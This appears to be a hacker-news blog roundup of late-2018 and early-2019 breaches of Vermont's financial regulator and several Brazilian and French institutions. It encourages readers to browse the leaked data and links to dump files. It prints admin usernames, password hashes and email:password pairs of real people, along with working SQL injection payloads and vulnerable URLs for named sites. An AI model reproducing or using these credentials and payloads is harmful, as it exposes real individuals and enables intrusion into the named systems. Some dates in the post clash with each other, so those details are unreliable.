Servers Belonging To Vermont’s Department of Financial Regulation Rooted, 41.48 Megabytes of Data Leaked Online

Late last night, January 27th 2019, a French based hacker belonging to the New World Hackers group going by the name of “Mizaru” announced a data dump of Vermont’s Department of Financial Regulation. The leak itself is too big to possibly explain in a couple of brief sentences here, but what I can report on is that approximately 41.48 Megabytes (MB) of data comprising of PHP Version: 5.6.15 files hosted on a 10.1.9-MariaDB database were hacked/leaked online, and that the departments servers were hacked via SQL vulnerabilities tied to URL’s addresses attached to the website back-end.

Included in the leak is information tied to various banks affiliated with the Government of Vermont, including their unique ID’s, code numbers, license numbers, issuance date, company name, trade name and addresses. The leaked data also includes access to state registration files, along with the hashed passwords necessary to access them, as well as full copies of internal memos, emails, documentation and much more. Honestly, the leak is so big that it’s almost impossible to summarize all at once here, so you are just going to have to browse through the leak for yourself this time.

Site: hxxp://dfr.vermont.gov/
Location of SQL Database Dump: http://dfr.vt.gov/bishcain_drupal.sql
Download Site Databases (41.48 MB): https://anonfile.com/o983S6r4b8/dfr.vt.gov_txt

https://twitter.com/MZR_h4x0r/status/1089617826284032001

Associação dos Proprietários Oficiais e Profissionais de Farmácia do Estado de São Paulo Hacked by Darkness Ghost

On January 22nd 2019, a Brasilian hacker going by the name of “Darkness Ghost” claimed responsibility for a hack of the website belonging to the Association of Official Owners and Professionals of Pharmacy of the State of São Paulo, Brasil. Through the leaked information provided below, you can gain administrator level access to the php file system structure of the associations website, giving you full control over all of the sites data/content.

Website: hxxp://aprofar.org.br
Raw Data Dump: https://ghostbin.com/paste/r48by
Admin Login: http: // www. aprofar.org.br/login.html

ADMIN AND PASSWORD DUMP:

USERNAME: ab2igmzom
PASSWORD: d83fb66b7ba8e382507ebba6bc83b18e

USERNAME: aprofar402
PASSWORD: 545a4d42c0fb5ad4c68f81fbe4016ed3

COMPANY ASSOCIATES EMAIL : PASSWORD

ariasag@hotmail.com : capeta
roateles@gmail.com : ab2igmzom
cielsilva234@gmail.com : 5cca4d2119a21964cab59b91670d970f
earaujogaldino@globomail.com : lkdx27

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak the contents of databases tied to the Hematology and Hemotherapy Center of Piaui online. Having covered Shizen many times throughout the past, this appears to be the first hack carried out under the banned of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances. 

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning, the hackers posted a mirror of the sites contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL vulnerabilities left unaddressed by site security architects, ultimately granting hackers access to PHP 5.3.3 files, attached to a MySQL 5.0 Database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities effected and payloads delivered within the framework of the leak itself – something normally redacted or kept private.

For Example, Here are The 4 SQL Vulnerabilities Implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=13′ AND 7214=7214 AND ‘aWjt’=’aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13′ AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘lEbP’=’lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13′ AND SLEEP(5) AND ‘ouoQ’=’ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=13′ UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)– EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok

Image may contain: text

https://twitter.com/__sh1z3n/status/1079589738355531777

Akatsuki Gang Releases Database Disclosure Vulnerability Effecting Tribunal de Contas do Distrito Federal

Last night the “Akatsuki Gang” leaked a Database Disclosure Vulnerability effecting the website of the Court of Auditors of the Federal District of Brasil, allowing for remote access/download of the websites file systems and databases. Analyzing their methodology, leveraging open ports left exposed by poorly constructed security settings, hackers were able to implement a Relative Path Traversal (CWE-23) attack against the websites file system structure, ultimately gaining access to a MySQL database hosting PHP 5.5.9. files hosted on an Apache 2.4.7 web server attached to a WordPress.org website.

It remains unclear what the hackers did with the data they uncovered, but what we do know is that they managed to gain access to 41 tables/folders inside a database labeled “selic,” exposing information such as passwords, site uploads, comments and administrator user data. In a message attached to the hack, the group left a sarcastic message reading “Um verdadeiro patriota é o tipo que leva uma multa de estacionamento e fica contente porque o sistema funcionou!” Translated this reads to say ‘a true Patriot is happy to get a parking ticket because that means the system has worked!‘ – lol. It remains unclear if that hack was conducted as a result of a parking ticket, or if the group was just being facetious.

Website Effected: hxxp://tc.df.gov.br/
Site Vulnerability: hxxp://tc.df.gov.br/selic/download.php?codof=41
Raw Leak: https://ghostbin.com/paste/e3zs5

No automatic alt text available.

l’academie de Grenoble Refused To Negotiate, So SHIZEN Dumps SQL Vulnerabilities & Exposed Databases Online

On December 6th 2018, Rogue Media Labs covered an article detailing the hack of two international University’s by a Brasilian based hacker known as “SHIZEN.” However, what made the incident interesting or unique at the time was that SHIZEN did not disclose the databases he had uncovered, or how he went about doing so – something he is regularly known for doing. Instead, he tagged l’academie de Grenoble in the hack, asking them to reach out to him to learn where/how he got into their systems and where their website was vulnerable. Over the course of the last week and a half since, SHIZEN has continued to keep this information to himself, trolling the University on multiple occasions asking them to contact him about the hack – less he release the information in its entirety online. After days with no response, this is exactly what SHIZEN did this morning.

In a data dump released to the public via Ghostbin this morning, December 15th 2016, SHIZEN released the contents of the databases exposed in the December 6th hack, explaining how he was able to breach l’academie de Grenobles’s website through an SQL vulnerability tied to the academy’s math department. More specifically, SHIZEN was able to hack php version 5.3.3 files belonging to an extremely outdated MySQL database attached to a nginx web server. In fact, the MySQL database was so outdated that it’s version wasn’t even readably identifiable.

Target Website: hxxp://ac-grenoble.com
SQL User Haxxed: plantet_math@triton2.ac-grenoble
Location of SQL Injection: hxxps://ac-grenoble.fr/disciplines/maths/pages/PM/fonction/telechargement.php?/fichier/=1899%27%20and%20[t]%20and%20%271%27=%271
Database Name: De8u1
Data Dump: https://ghostbin.com/paste/58cjh

https://twitter.com/__sh1z3n/status/1074336600333656064?s=19

Databases of Faculdade Faveni Hacked and Dumped Online, Exposing Information on +400 Students

Earlier today, December 11th 2018, “Ergo Hacker” of Pryzraky announced a hack of Faculdade Faveni, a post graduate university in Venda Nova do Imigrante, Brasil. The hack itself was carried out in conjunction with #OpEdu, a much broader hacking operation targeting international colleges and universities which as already seen the hack/leak of Baqai Medical University in Pakistan, l’académie de Grenoble in France, San Jose State University in the US and Academia Nacional De La Historia De La Republica Argentina – among many others.

In the press release provided below, Ergo explains how he was able to breach PHP 5.5.38 file systems attached to two MySQL 5.0 databases belonging to the hostname (sv251.faveni.edu.br). Presumably exploiting the back-end of the website via SQL Injection, Ergo then managed to uncover and extract approximately 128.27 KB of data pertaining to over 400 post-graduate students, including full names, emails, CPF, tuition rates, course enrollments and much more.

Website Effected: hxxp://posgraduacaofaveni.com.br/
Full Raw Leak: https://ghostbin.com/paste/2ovuf
Database Download (128.27 KB): https://anonfile.com/X5Z3vfn1b3/alunos_xlsx

https://twitter.com/ergo_hacker/status/1072588043222167554